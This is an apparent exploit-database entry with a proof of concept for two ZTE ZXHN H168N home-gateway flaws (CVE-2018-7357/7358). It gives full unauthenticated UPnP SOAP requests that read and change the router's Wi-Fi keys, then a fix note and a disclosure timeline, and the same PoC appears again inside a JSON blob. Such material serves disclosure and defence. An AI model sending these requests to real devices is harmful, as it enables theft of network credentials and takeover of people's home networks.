Search...

ZTE Home Gateway ZXHN H168N 2.2 Access Control Bypass Vulnerability

2018-12-11T00:00:00

ID 1337DAY-ID-31756
Type zdt
Reporter Usman Saeed
Modified 2018-12-11T00:00:00

Description

ZTE Home Gateway ZXHN H168N suffers from multiple access bypass and information disclosure vulnerabilities.

                                        
                                            [*] POC: (CVE-2018-7357 and CVE-2018-7358)

Disclaimer: [This POC is for Educational Purposes , I would Not be


responsible for any misuse of the information mentioned in this blog post]

[+] Unauthenticated

[+] Author: Usman Saeed (usman [at] xc0re.net)

[+] Protocol: UPnP

[+] Affected Harware/Software:

Model name: ZXHN H168N v2.2

Build Timestamp: 20171127193202

Software Version: V2.2.0_PK1.2T5

[+] Findings:

1. Unauthenticated access to WLAN password:


POST /control/igd/wlanc_1_1 HTTP/1.1

Host: &lt;IP&gt;:52869

User-Agent: {omitted}

Content-Length: 288

Connection: close

Content-Type: text/xml; charset="utf-8"

SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" 1


&lt;?xml version="1.0" encoding="utf-8"?&gt;

&lt;s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt;&lt;s:Body&gt;&lt;u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"&gt;&lt;/u:GetSecurityKeys&gt;&lt;/s:Body&gt;&lt;/s:Envelope&gt;


2. Unauthenticated WLAN passphrase change:

POST /control/igd/wlanc_1_1 HTTP/1.1

Host: &lt;IP&gt;:52869

User-Agent: {omitted}

Content-Length: 496

Connection: close

Content-Type: text/xml; charset="utf-8"

SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"

&lt;?xml version="1.0" encoding="utf-8"?&gt;


&lt;s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt;&lt;s:Body&gt;&lt;u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"&gt;&lt;NewWEPKey0&gt;{omitted}&lt;/NewWEPKey0&gt;&lt;NewWEPKey1&gt;{omitted}&lt;/NewWEPKey1&gt;&lt;NewWEPKey2&gt;{omitted}&lt;/NewWEPKey2&gt;&lt;NewWEPKey3&gt;{omitted}&lt;/NewWEPKey3&gt;&lt;NewPreSharedKey&gt;{omitted}&lt;/NewPreSharedKey&gt;&lt;NewKeyPassphrase&gt;{omitted}&lt;/NewKeyPassphrase&gt;&lt;/u:SetSecurityKeys&gt;&lt;/s:Body&gt;&lt;/s:Envelope&gt;


[*] Solution:


UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.


[*] Note:

There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.

[+] Responsible Disclosure:

Vulnerabilities identified - 20 August, 2018

Reported to ZTE - 28 August, 2018

ZTE official statement - 17 September 2018

ZTE patched the vulnerability - 12 November 2018

The operator pushed the update - 12 November 2018

CVE published - CVE- 2018-7357 and CVE-2018-7358

Public disclosure - 12 November 2018

Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522

#  0day.today [2018-12-12]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-31756", "bulletinFamily": "exploit", "title": "ZTE Home Gateway ZXHN H168N 2.2 Access Control Bypass Vulnerability", "description": "ZTE Home Gateway ZXHN H168N suffers from multiple access bypass and information disclosure vulnerabilities.", "published": "2018-12-11T00:00:00", "modified": "2018-12-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/31756", "reporter": "Usman Saeed", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-12-12T07:55:38", "edition": 1, "viewCount": 37, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2018-12-12T07:55:38", "rev": 2}, "dependencies": {"references": [], "modified": "2018-12-12T07:55:38", "rev": 2}, "vulnersScore": -0.2}, "sourceHref": "https://0day.today/exploit/31756", "sourceData": "[*] POC: (CVE-2018-7357 and CVE-2018-7358)\r\n\r\nDisclaimer: [This POC is for Educational Purposes , I would Not be\r\n\r\n\r\nresponsible for any misuse of the information mentioned in this blog post]\r\n\r\n[+] Unauthenticated\r\n\r\n[+] Author: Usman Saeed (usman [at] xc0re.net)\r\n\r\n[+] Protocol: UPnP\r\n\r\n[+] Affected Harware/Software:\r\n\r\nModel name: ZXHN H168N v2.2\r\n\r\nBuild Timestamp: 20171127193202\r\n\r\nSoftware Version: V2.2.0_PK1.2T5\r\n\r\n[+] Findings:\r\n\r\n1. Unauthenticated access to WLAN password:\r\n\r\n\r\nPOST /control/igd/wlanc_1_1 HTTP/1.1\r\n\r\nHost: <IP>:52869\r\n\r\nUser-Agent: {omitted}\r\n\r\nContent-Length: 288\r\n\r\nConnection: close\r\n\r\nContent-Type: text/xml; charset=\"utf-8\"\r\n\r\nSOAPACTION: \"urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys\" 1\r\n\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n\r\n<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\"></u:GetSecurityKeys></s:Body></s:Envelope>\r\n\r\n\r\n2. Unauthenticated WLAN passphrase change:\r\n\r\nPOST /control/igd/wlanc_1_1 HTTP/1.1\r\n\r\nHost: <IP>:52869\r\n\r\nUser-Agent: {omitted}\r\n\r\nContent-Length: 496\r\n\r\nConnection: close\r\n\r\nContent-Type: text/xml; charset=\"utf-8\"\r\n\r\nSOAPACTION: \"urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys\"\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n\r\n\r\n<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:SetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>\r\n\r\n\r\n[*] Solution:\r\n\r\n\r\nUPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.\r\n\r\n\r\n[*] Note:\r\n\r\nThere are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.\r\n\r\n[+] Responsible Disclosure:\r\n\r\nVulnerabilities identified - 20 August, 2018\r\n\r\nReported to ZTE - 28 August, 2018\r\n\r\nZTE official statement - 17 September 2018\r\n\r\nZTE patched the vulnerability - 12 November 2018\r\n\r\nThe operator pushed the update - 12 November 2018\r\n\r\nCVE published - CVE- 2018-7357 and CVE-2018-7358\r\n\r\nPublic disclosure - 12 November 2018\r\n\r\nRef: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522\n\n# 0day.today [2018-12-12] #"}